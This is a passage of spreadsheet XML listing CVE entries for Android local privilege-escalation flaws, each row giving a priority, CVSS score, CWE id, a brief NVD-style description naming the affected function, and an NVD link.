          <t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t>
        </is>
      </c>
    </row>
    <row r="2023">
      <c r="A2023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28599</t>
        </is>
      </c>
      <c r="C2023" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2023" s="5" t="inlineStr"/>
      <c r="F2023" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2023" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2023" s="5" t="inlineStr"/>
      <c r="I2023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2023" s="5" t="inlineStr"/>
      <c r="K2023" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2023" s="5" t="inlineStr">
        <is>
          <t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t>
        </is>
      </c>
    </row>
    <row r="2024">
      <c r="A2024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28600</t>
        </is>
      </c>
      <c r="C2024" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2024" s="5" t="inlineStr"/>
      <c r="F2024" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2024" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2024" s="5" t="inlineStr"/>
      <c r="I2024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2024" s="5" t="inlineStr"/>
      <c r="K2024" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2024" s="5" t="inlineStr">
        <is>
          <t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t>
        </is>
      </c>
    </row>
    <row r="2025">
      <c r="A2025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28602</t>
        </is>
      </c>
      <c r="C2025" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2025" s="5" t="inlineStr"/>
      <c r="F2025" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2025" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2025" s="5" t="inlineStr"/>
      <c r="I2025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2025" s="5" t="inlineStr"/>
      <c r="K2025" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2025" s="5" t="inlineStr">
        <is>
          <t>In setClipboardAccessNotificationsEnabledForUser of ClipboardService.java, there is a possible mult-iuser isolation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t>
        </is>
      </c>
    </row>
    <row r="2026">
      <c r="A2026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28603</t>
        </is>
      </c>
      <c r="C2026" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2026" s="5" t="inlineStr"/>
      <c r="F2026" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2026" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2026" s="5" t="inlineStr"/>
      <c r="I2026" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2026" s="5" t="inlineStr"/>
      <c r="K2026" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2026" s="5" t="inlineStr">
        <is>
          <t>In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible read/write access to private files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t>
        </is>
      </c>
    </row>
    <row r="2027">
      <c r="A2027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28607</t>
        </is>
      </c>
      <c r="C2027" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2027" s="5" t="inlineStr"/>
      <c r="F2027" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2027" s="5" t="inlineStr"/>
      <c r="H2027" s="5" t="inlineStr"/>
      <c r="I2027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2027" s="5" t="inlineStr"/>
      <c r="K2027" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2027" s="5" t="inlineStr">
        <is>
          <t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t>
        </is>
      </c>
    </row>
    <row r="2028">
      <c r="A2028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28611</t>
        </is>
      </c>
      <c r="C2028" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2028" s="5" t="inlineStr"/>
      <c r="F2028" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2028" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2028" s="5" t="inlineStr"/>
      <c r="I2028" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2028" s="5" t="inlineStr"/>
      <c r="K2028" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2028" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of NfcService.java, there is a possible silent payment session hijacking enablement due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t>
        </is>
      </c>
    </row>
    <row r="2029">
      <c r="A2029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28612</t>
        </is>
      </c>
      <c r="C2029" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2029" s="5" t="inlineStr"/>
      <c r="F2029" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2029" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2029" s="5" t="inlineStr"/>
      <c r="I2029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2029" s="5" t="inlineStr"/>
      <c r="K2029" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2029" s="5" t="inlineStr">
        <is>
          <t>In resolveActivity of ActivityStarter.java, there is a possible way to perform Intent Redirection attacks due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t>
        </is>
      </c>
    </row>
    <row r="2030">
      <c r="A2030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28614</t>
        </is>
      </c>
      <c r="C2030" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2030" s="5" t="inlineStr"/>
      <c r="F2030" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2030" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2030" s="5" t="inlineStr"/>
      <c r="I2030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2030" s="5" t="inlineStr"/>
      <c r="K2030" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2030" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t>
        </is>
      </c>
    </row>
    <row r="2031">
      <c r="A2031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28616</t>
        </is>
      </c>
      <c r="C2031" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2031" s="5" t="inlineStr"/>
      <c r="F2031" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2031" s="5" t="inlineStr"/>
      <c r="H2031" s="5" t="inlineStr"/>
      <c r="I2031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2031" s="5" t="inlineStr"/>
      <c r="K2031" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2031" s="5" t="inlineStr">
        <is>
          <t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t>
        </is>
      </c>
    </row>
    <row r="2032">
      <c r="A2032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28620</t>
        </is>
      </c>
      <c r="C2032" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2032" s="5" t="inlineStr"/>
      <c r="F2032" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2032" s="5" t="inlineStr"/>
      <c r="H2032" s="5" t="inlineStr"/>
      <c r="I2032" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2032" s="5" t="inlineStr"/>
      <c r="K2032" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2032" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t>
        </is>
      </c>
    </row>
    <row r="2033">
      <c r="A2033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28624</t>
        </is>
      </c>
      <c r="C2033" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2033" s="5" t="inlineStr"/>
      <c r="F2033" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2033" s="5" t="inlineStr"/>
      <c r="H2033" s="5" t="inlineStr"/>
      <c r="I2033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2033" s="5" t="inlineStr"/>
      <c r="K2033" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2033" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t>
        </is>
      </c>
    </row>
    <row r="2034">
      <c r="A2034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28631</t>
        </is>
      </c>
      <c r="C2034" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2034" s="5" t="inlineStr"/>
      <c r="F2034" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2034" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2034" s="5" t="inlineStr"/>
      <c r="I2034" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2034" s="5" t="inlineStr"/>
      <c r="K2034" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2034" s="5" t="inlineStr">
        <is>
          <t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t>
        </is>
      </c>
    </row>
    <row r="2035">
      <c r="A2035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28634</t>
        </is>
      </c>
      <c r="C2035" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2035" s="5" t="inlineStr"/>
      <c r="F2035" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2035" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2035" s="5" t="inlineStr"/>
      <c r="I2035" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2035" s="5" t="inlineStr"/>
      <c r="K2035" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2035" s="5" t="inlineStr">
        <is>
          <t>In handleUssdRequest of PhoneInterfaceManager.java, there is a possible way to send a USSD request without permission due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t>
        </is>
      </c>
    </row>
    <row r="2036">
      <c r="A2036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28636</t>
        </is>
      </c>
      <c r="C2036" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2036" s="5" t="inlineStr"/>
      <c r="F2036" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2036" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2036" s="5" t="inlineStr"/>
      <c r="I2036" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2036" s="5" t="inlineStr"/>
      <c r="K2036" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2036" s="5" t="inlineStr">
        <is>
          <t>In setupLayout of PickActivity.java, there is a possible bypass of the "Install unknown apps" security restriction due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t>
        </is>
      </c>
    </row>
    <row r="2037">
      <c r="A2037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28639</t>
        </is>
      </c>
      <c r="C2037" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2037" s="5" t="inlineStr"/>
      <c r="F2037" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2037" s="5" t="inlineStr"/>
      <c r="H2037" s="5" t="inlineStr"/>
      <c r="I2037" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2037" s="5" t="inlineStr"/>
      <c r="K2037" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2037" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t>
        </is>
      </c>
    </row>
    <row r="2038">
      <c r="A2038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28642</t>
        </is>
      </c>
      <c r="C2038" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2038" s="5" t="inlineStr"/>
      <c r="F2038" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2038" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2038" s="5" t="inlineStr"/>
      <c r="I2038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2038" s="5" t="inlineStr"/>
      <c r="K2038" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2038" s="5" t="inlineStr">
        <is>
          <t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t>
        </is>
      </c>
    </row>
    <row r="2039">
      <c r="A2039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28644</t>
        </is>
      </c>
      <c r="C2039" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2039" s="5" t="inlineStr"/>
      <c r="F2039" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2039" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2039" s="5" t="inlineStr"/>
      <c r="I2039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2039" s="5" t="inlineStr"/>
      <c r="K2039" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2039" s="5" t="inlineStr">
        <is>
          <t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t>
        </is>
      </c>
    </row>
    <row r="2040">
      <c r="A2040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28650</t>
        </is>
      </c>
      <c r="C2040" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2040" s="5" t="inlineStr"/>
      <c r="F2040" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2040" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H2040" s="5" t="inlineStr"/>
      <c r="I2040" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2040" s="5" t="inlineStr"/>
      <c r="K2040" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2040" s="5" t="inlineStr">
        <is>
          <t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t>
        </is>
      </c>
    </row>
    <row r="2041">
      <c r="A2041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28653</t>
        </is>
      </c>
      <c r="C2041" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2041" s="5" t="inlineStr"/>
      <c r="F2041" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2041" s="5" t="inlineStr"/>
      <c r="H2041" s="5" t="inlineStr"/>
      <c r="I2041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2041" s="5" t="inlineStr"/>
      <c r="K2041" s="5" t="inlineStr">
        <is>
          <t>CWE-1190, CWE-787</t>
        </is>
      </c>
      <c r="L2041" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t>
        </is>
      </c>
    </row>
    <row r="2042">
      <c r="A2042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28655</t>
        </is>
      </c>
      <c r="C2042" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2042" s="5" t="inlineStr"/>
      <c r="F2042" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2042" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2042" s="5" t="inlineStr"/>
      <c r="I2042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2042" s="5" t="inlineStr"/>
      <c r="K2042" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2042" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t>
        </is>
      </c>
    </row>
    <row r="2043">
      <c r="A2043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28657</t>
        </is>
      </c>
      <c r="C2043" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2043" s="5" t="inlineStr"/>
      <c r="F2043" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2043" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2043" s="5" t="inlineStr"/>
      <c r="I2043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2043" s="5" t="inlineStr"/>
      <c r="K2043" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2043" s="5" t="inlineStr">
        <is>
          <t>In onActivityResult of AppWidgetConfigActivityProxy.java, there is a possible unauthorized URI permission grant due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t>
        </is>
      </c>
    </row>
    <row r="2044">
      <c r="A2044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28658</t>
        </is>
      </c>
      <c r="C2044" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2044" s="5" t="inlineStr"/>
      <c r="F2044" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2044" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2044" s="5" t="inlineStr"/>
      <c r="I2044" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2044" s="5" t="inlineStr"/>
      <c r="K2044" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2044" s="5" t="inlineStr">
        <is>
          <t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t>
        </is>
      </c>
    </row>
    <row r="2045">
      <c r="A2045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28663</t>
        </is>
      </c>
      <c r="C2045" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2045" s="5" t="inlineStr"/>
      <c r="F2045" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2045" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2045" s="5" t="inlineStr"/>
      <c r="I2045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2045" s="5" t="inlineStr"/>
      <c r="K2045" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2045" s="5" t="inlineStr">
        <is>
